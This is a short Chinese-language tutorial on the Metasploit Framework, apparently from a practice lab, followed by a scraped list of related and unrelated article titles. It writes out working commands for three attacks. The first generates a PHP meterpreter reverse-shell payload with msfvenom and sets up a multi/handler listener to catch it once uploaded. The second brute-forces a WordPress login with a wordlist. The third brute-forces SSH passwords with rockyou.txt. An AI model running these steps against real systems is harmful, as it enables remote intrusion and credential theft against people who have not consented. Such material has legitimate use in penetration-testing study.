metasploit framework
1,制作一个反弹shell,来执行服务的命令,并监听
(能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的)
(制作python型的只需要把php改为python就可以了)
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw
-p 指定使用模块 -f raw 显示源代码
使用msfconsole监听
msfconsole
use exploit/multi/handler //使用 这个攻击模块
set payload php/meterpreter/reverse_tcp //设置payload
show options
set lhost 192.168.11.165
run
然后上传并执行 反弹shell代码
在监听端就会显示相应内容
2,暴力破解wordpress的password
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set username admin
set pass_file /usr/share/wordlists/dirb/comment.txt
set targeturl /secret/
set rhost 192.168.11.170
run
其中如果不知道 username 可以用 wpscan 先进行暴力破解 username
3,暴力破解ssh的登录密码
msfconsole
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.106set username hadiset pass_file /usr/share/wordlists/rockyou.txt //设置字典set thread 10show optionsrun
metasploit framework相关推荐
- Metasploit Framework(MSF)的使用
目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010( ...
- Metasploit Framework 简介与使用
Metasploit Framework是一个编写,测试和使用exploit代码的完善环境.这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl ...
- Metasploit Framework(1)基本命令、简单使用
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 基本的控制台命令介绍: banner 查看metasp ...
- metasploit下载教程linux,在Debian 10/9系统上安装Metasploit Framework的方法
本文介绍在Debian 10/9操作系统上安装Metasploit Framework的方法,以脚本的方式安装,全程相当的简单,按照以下步骤操作即可. 在Debian 10/Debian 9上安装Me ...
- Metasploit Framework(6)客户端渗透(上)
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 前五篇文章讲解了Metasploit Framewor ...
- windows上安装Metasploit Framework 4.0
今天在给朋友的windows上安装Metasploit Framework 4.0的时候出现以下错误: Error running C:\Program Files\Rapid7\framework/ ...
- Metasploit Framework Handbook
文章目录 前言 MsFramework Metasploit 诞生发展 体系结构 功能阶段 工具管理 基本命令 情报搜集 网络服务渗透测试 Refference 前言 众所周知Metasploit工具 ...
- Metasploit Framework(MSF)基础框架
Metasploit简介 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗 ...
- Metasploit Framework下的Exploit应用开发中文手册
为了方便大家手记,以下内容有PDF转化而来,如果不方便阅读或遇错,请下载PDF版本阅读! 作者:gz1x [gz1x@tom.com] [目录] 目录----- ...
- 【无标题】Metasploit Framework(更新中······)
MSF 默认集成于Kali Linux 之中 使用postgresql数据库存储数据 – 早期版本需要先启动数据库再启动msf MSF架构 MSF架构 Rex – 基本功能库,用于完成日常基本任务,无 ...
最新文章
- springmvc接收前台(可以是ajax)传来的数组list,map,set等集合,复杂对象集合等图文详解...
- sed和awk中使用shell变量
- UUID介绍与生成方法
- 表弟:这数学规律题该怎么解决呢?使用Python你会发现很简单
- 微信新功能又来了,这些功能再次打开了我新世界的大门!
- [密码学基础][每个信息安全博士生应该知道的52件事][Bristol Cryptography][第25篇]使用特殊的素数定义GF(p)和GF(2^n)的方法
- python app开发模块_Python pytkapp包_程序模块 - PyPI - Python中文网
- Java基础知识编写一个HelloWorld案例
- Java 线程 fork join 是什么 怎么用
- 将DynamipsGUI和VMware虚拟机进行桥接
- NYOJ题目71-独木舟上的旅行(贪心)
- c语言计算10亿位圆周率,C语言:圆周率的计算
- 精读CSS权威指南第四版(1)
- 无网络状态下显卡驱动软件安装
- 服务器信息批量收集,如何批量导入或导出服务器信息
- 泡泡龙游戏的完整制作流程
- 计算机的空间复用技术应用,MIMO技术的介绍
- 电池充放电1c指的是什么
- 手机怎么把图片制作成短视频,原来还有这种傻瓜式的操作,长知识了
- 音视频编解码基础知识(1)- 音视频编解码过程
热门文章
- python notebook使用,Jupyter Notebook使用笔记
- python verilog顶层连线,如何在Verilog中连接两个模块?
- android 获取手机SD卡和手机的内部存储
- zip: stdin: unexpected end of file tar: 归档文件中异常的 EOF tar: 归档文件中异常的 EOF tar: Error is not recoverable
- 直播 | 清华大学李一鸣:后门攻击简介
- 殊途同归的策略梯度与零阶优化
- ICLR 2020 | 多模态下使用图片信息显著增强机器翻译效果
- CVPR 2020 | ActBERT: 自监督多模态视频文字学习
- 机器学习常见知识点自查50问与答
- include_fns.php_管理页面